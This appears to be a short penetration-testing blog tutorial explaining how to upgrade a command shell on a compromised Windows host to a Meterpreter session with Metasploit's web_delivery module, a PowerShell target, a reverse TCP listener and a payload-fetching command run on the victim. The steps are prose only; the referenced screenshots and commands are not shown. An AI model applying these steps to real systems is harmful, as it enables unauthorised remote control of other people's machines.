When attempting to compromise a target, we want as much control as possible over the victim. Meterpreter is one such utility which provides us complete control over the victim machine. In most cases, we just exploit the target machine and get meterpreter session. However, In some cases the exploit provides us command shell instead of a meterpreter session.
In this post, we are assuming that we have a command shell over victim’s machine and our goal is to escalate our shell to meterpreter session.
STEP 1 : Launch Metasploit and Select the Appropriate Module
Launch metasploit by typing msfconsole in terminal and use the exploit/multi/script/web_delivery module
STEP 2 : List Options
Now that we are inside web_delivery module, let’s just try to list the available options
STEP 3 : Set the target
If you see the previous screenshot, you will notice that the target is set to python by default. We need to change it to powershell.
STEP 4 : Set Payload and other options
Now that we have our target set, next thing we are going to do is set the payload compatible with our target. We also need to set other mandatory options as well.
Set lhost and srvhost to ip address of the attackers machine and lport to some arbitrary port. I am gonna use 8888 for now.
STEP 5 : Exploit
Now that we have everything set up, let’s just try to exploit.
STEP 6 : Getting Meterpreter session
After hitting exploit, metasploit will set up a reverse tcp listener on attacker’s machine. It will also generate a windows command (highlighted above) which will be using powershell to deliver the payload. Now, all you need to do is copy the command and execute it on victim’s machine. Since, you already have a command shell on victim’s machine this won’t be difficult.
Now that we have got our meterpreter session, we can proceed further to escalate our privileges.
Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.